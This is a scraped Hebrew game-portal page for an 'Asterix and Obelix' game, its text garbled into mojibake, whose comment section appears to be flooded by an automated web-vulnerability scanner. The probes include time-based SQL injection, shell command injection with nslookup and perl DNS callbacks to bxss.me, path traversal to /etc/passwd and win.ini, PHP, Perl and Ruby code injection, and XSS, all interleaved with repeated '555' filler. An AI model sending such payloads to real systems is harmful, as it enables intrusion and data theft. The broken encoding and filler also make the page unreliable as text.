àñèøé÷ñ åàåáìé÷ñ
öéåï 7.2
úàøéê: 22/01/2012
ñä"ë ëðéñåú: 35421
òëùéå îùç÷éí: 0
-
òì äîùç÷
àñèøé÷ñ åàåáìé÷ñ
äòéøå àú æåâ äðîðîðéí -
äåøàåú äîùç÷
àéê îùç÷éí?
äðéçå áæäéøåú çôöéí áòæøú äòëáø
àäáú àú äîùç÷? ùúó!
àôùøåéåú ùéúåó àñèøé÷ñ åàåáìé÷ñ:
- ÷éùåø ìîùç÷:
- ÷éùåøéí ìîùç÷:
- ÷åã xhtml ú÷ðé:
- ÷åã BBcode (îåúàí ìôåøåîéí):
- ÷åã xhtml ú÷ðé:
- Embed:
- ÷åã embed îìà ìîùç÷:
øæåìåöééú îùç÷: 640x480
- ÷åã embed îìà ìîùç÷:
îùç÷ ðçîã
555
555
1qc8SSlO
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9637372*9494656)
'+response.write(9637372*9494656)+'
"+response.write(9637372*9494656)+"
555
Rxr0fT7t
555
555
555
555
555
555
555
555
555
555
../../../../../../../../../../etc/passwd
555
555
../../../../../../../../../../windows/win.ini
555
555
555
12345'"\'\");|]*{ ¿''💡
555
../555
555
555
echo ctxbvv$()\ eioqjx\nz^xyu||a #' &echo ctxbvv$()\ eioqjx\nz^xyu||a #|" &echo ctxbvv$()\ eioqjx\nz^xyu||a #
555
555
${9999190+9999308}
&echo ffhtiq$()\ wmmanz\nz^xyu||a #' &echo ffhtiq$()\ wmmanz\nz^xyu||a #|" &echo ffhtiq$()\ wmmanz\nz^xyu||a #
555
555
|echo purhqv$()\ skgkpo\nz^xyu||a #' |echo purhqv$()\ skgkpo\nz^xyu||a #|" |echo purhqv$()\ skgkpo\nz^xyu||a #
555
555&n989985=v947605
555
555
(nslookup hitdpljouhdsh7f05c.bxss.me||perl -e "gethostbyname('hitdpljouhdsh7f05c.bxss.me')")
555
555
555
$(nslookup hitpvelynvtrqea1d7.bxss.me||perl -e "gethostbyname('hitpvelynvtrqea1d7.bxss.me')")
555
555
555
&(nslookup hitszoleahjnxbd001.bxss.me||perl -e "gethostbyname('hitszoleahjnxbd001.bxss.me')")&'\"`0&(nslookup hitszoleahjnxbd001.bxss.me||perl -e "gethostbyname('hitszoleahjnxbd001.bxss.me')")&`'
555
555
555
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
555
555
|(nslookup hitajmosmjjcz33eca.bxss.me||perl -e "gethostbyname('hitajmosmjjcz33eca.bxss.me')")
555
1some_inexistent_file_with_long_name.jpg
`(nslookup hittoeyucqvur6b231.bxss.me||perl -e "gethostbyname('hittoeyucqvur6b231.bxss.me')")`
555
555
Http://bxss.me/t/fit.txt
'"()
555
555
;(nslookup hitjryksveost491f2.bxss.me||perl -e "gethostbyname('hitjryksveost491f2.bxss.me')")|(nslookup hitjryksveost491f2.bxss.me||perl -e "gethostbyname('hitjryksveost491f2.bxss.me')")&(nslookup hitjryksveost491f2.bxss.me||perl -e "gethostbyname('hitjryksveost491f2.bxss.me')")
)
http://bxss.me/t/fit.txt?.jpg
!(()&&!|*|*|
555
555
bxss.me
^(#$!@#$)(()))******
555
555
555
555
'.gethostbyname(lc('hitki'.'xtkbwesi14701.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(74).chr(118).chr(69).'
555
555
555
".gethostbyname(lc("hitpx"."yyqyybvj3bdde.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(65).chr(113).chr(88)."
555
555
555
555
555
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
555
555
555
555
555
bxss.me/t/xss.html?%00
555
555
555
555
555
555
555
555
;print(md5(31337));
555
555
555
';print(md5(31337));$a='
555
555
555
555
";print(md5(31337));$a="
555
555
"+"A".concat(70-3).concat(22*4).concat(114).concat(87).concat(109).concat(66)+(require"socket" Socket.gethostbyname("hitma"+"bepqfwurf7e4c.bxss.me.")[3].to_s)+"
555
555
${@print(md5(31337))}
555
555
'+'A'.concat(70-3).concat(22*4).concat(101).concat(88).concat(118).concat(83)+(require'socket' Socket.gethostbyname('hitxz'+'bdelgmss9eb09.bxss.me.')[3].to_s)+'
comments.php
555
${@print(md5(31337))}\
555
555
comments.php
555
'.print(md5(31337)).'
555
comments.php/.
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
/xfs.bxss.me
555
555
555
555
555
555
'"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%O4lb(9796)
'"()&%O4lb(9477)
5559062903
555
555
555
555
555
555
555
555
555
555
555
555
0qFjSje6
-1 OR 2+879-879-1=0+0+0+1 --
-1 OR 2+189-189-1=0+0+0+1
-1' OR 2+405-405-1=0+0+0+1 --
-1' OR 2+484-484-1=0+0+0+1 or 'B0eptFnY'='
-1" OR 2+831-831-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
WXO8Krsh'; waitfor delay '0:0:15' --
-5 OR 492=(SELECT 492 FROM PG_SLEEP(15))--
-5) OR 785=(SELECT 785 FROM PG_SLEEP(15))--
-1)) OR 456=(SELECT 456 FROM PG_SLEEP(15))--
dR1R4wIS' OR 905=(SELECT 905 FROM PG_SLEEP(15))--
jFhgXpr7') OR 928=(SELECT 928 FROM PG_SLEEP(15))--
cOcLAptH')) OR 46=(SELECT 46 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
1ˤˢ%2527%2522
@@AWoa3
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9430306*9966319)
'+response.write(9430306*9966319)+'
"+response.write(9430306*9966319)+"
555
555
ooIoApm8
555
555
555
555
555
555
555
555
555
555
echo xwixji$()\ sgpwhc\nz^xyu||a #' &echo xwixji$()\ sgpwhc\nz^xyu||a #|" &echo xwixji$()\ sgpwhc\nz^xyu||a #
../../../../../../../../../../etc/passwd
&echo bwdxrl$()\ ugkkuy\nz^xyu||a #' &echo bwdxrl$()\ ugkkuy\nz^xyu||a #|" &echo bwdxrl$()\ ugkkuy\nz^xyu||a #
12345'"\'\");|]*{ ¿''💡
../../../../../../../../../../windows/win.ini
555
|echo erpgmv$()\ kincpp\nz^xyu||a #' |echo erpgmv$()\ kincpp\nz^xyu||a #|" |echo erpgmv$()\ kincpp\nz^xyu||a #
555
555
(nslookup hitisdymxwspa7ca5d.bxss.me||perl -e "gethostbyname('hitisdymxwspa7ca5d.bxss.me')")
../555
${10000259+9999462}
$(nslookup hitmtwwfcrzwo6eb30.bxss.me||perl -e "gethostbyname('hitmtwwfcrzwo6eb30.bxss.me')")
&(nslookup hitkuvzxwxnla25262.bxss.me||perl -e "gethostbyname('hitkuvzxwxnla25262.bxss.me')")&'\"`0&(nslookup hitkuvzxwxnla25262.bxss.me||perl -e "gethostbyname('hitkuvzxwxnla25262.bxss.me')")&`'
555
|(nslookup hitwiaxkxtgntad4d3.bxss.me||perl -e "gethostbyname('hitwiaxkxtgntad4d3.bxss.me')")
555
`(nslookup hitrtajfezzmabf9e9.bxss.me||perl -e "gethostbyname('hitrtajfezzmabf9e9.bxss.me')")`
555
555
;(nslookup hitwvahlokmdef7003.bxss.me||perl -e "gethostbyname('hitwvahlokmdef7003.bxss.me')")|(nslookup hitwvahlokmdef7003.bxss.me||perl -e "gethostbyname('hitwvahlokmdef7003.bxss.me')")&(nslookup hitwvahlokmdef7003.bxss.me||perl -e "gethostbyname('hitwvahlokmdef7003.bxss.me')")
555
555
555
555
555
555&n922856=v945708
555
555
555
555
555
555
555
555
555
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
555
555
1some_inexistent_file_with_long_name.jpg
555
'"()
Http://bxss.me/t/fit.txt
555
http://bxss.me/t/fit.txt?.jpg
)
bxss.me
555
!(()&&!|*|*|
555
555
^(#$!@#$)(()))******
555
555
555
555
555
555
'.gethostbyname(lc('hitdg'.'zzmivwbs7b9eb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(77).chr(104).chr(67).'
555
555
555
".gethostbyname(lc("hitxk"."qnumchqrc0eee.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(90).chr(109).chr(71)."
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(111).concat(71).concat(105).concat(72)+(require"socket" Socket.gethostbyname("hitcw"+"ksmejjpne5666.bxss.me.")[3].to_s)+"
555
555
bxss.me/t/xss.html?%00
'+'A'.concat(70-3).concat(22*4).concat(113).concat(85).concat(116).concat(80)+(require'socket' Socket.gethostbyname('hitgg'+'ewljjnvp7340d.bxss.me.')[3].to_s)+'
;print(md5(31337));
comments.php
comments.php
';print(md5(31337));$a='
comments.php/.
";print(md5(31337));$a="
555
555
${@print(md5(31337))}
555
555
${@print(md5(31337))}\
555
'.print(md5(31337)).'
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
555
555
555
555
555
555
/xfs.bxss.me
555
'"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%p8Z4(9066)
'"()&%p8Z4(9477)
5559048549
555
555
555
555
555
555
555
555
555
lF4eQ17o
-1 OR 2+856-856-1=0+0+0+1 --
-1 OR 2+981-981-1=0+0+0+1
-1' OR 2+961-961-1=0+0+0+1 --
-1' OR 2+70-70-1=0+0+0+1 or 'RQTeWNdi'='
-1" OR 2+478-478-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
xDp2XeLD'; waitfor delay '0:0:15' --
-5 OR 241=(SELECT 241 FROM PG_SLEEP(15))--
-5) OR 380=(SELECT 380 FROM PG_SLEEP(15))--
-1)) OR 407=(SELECT 407 FROM PG_SLEEP(15))--
cXnUCLMY' OR 240=(SELECT 240 FROM PG_SLEEP(15))--
q0i1Elv4') OR 979=(SELECT 979 FROM PG_SLEEP(15))--
HTmwWYIH')) OR 279=(SELECT 279 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
1ˤˢ%2527%2522
@@gzdm4
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555